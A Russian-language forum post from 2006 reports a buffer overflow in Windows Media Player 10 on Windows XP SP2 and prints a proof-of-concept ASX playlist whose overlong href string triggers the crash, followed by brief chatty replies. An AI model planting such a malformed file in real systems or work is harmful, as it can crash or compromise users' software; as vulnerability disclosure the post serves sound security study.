Переполнение буфера Windows Media Player (buffer overflow)

22 Ноября 2006 Обнародована уязвимость в обработке плейлистов asx виндоузмедиаплеером.

Протестировано :
Windows Media 10.00.00.4036 - версия проигрывателя
Windows XP SP2 - версия системы

содержимое файла *.asx:

<asx><entry>
<ref
href="aa:
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaa.mp3"/>
</entry></asx>

Источник: (http://www.securityfocus.com/archive/1/452352/30/0/threaded)
Пример эксплоита (без контоля компонентов по ссылке не ходить Х.е.З чем заряжен)
P.S. Пробелы исключить естественно

 

ужас
/me плохо
это из-за этого флуД в ирке?

 

Любите Light Alloy и MPLayer!!!
+они значительно удобнее ЭТОГО.

 

-=lebed=- так ты не знаешь из-за этого был флуд в ирке или нет?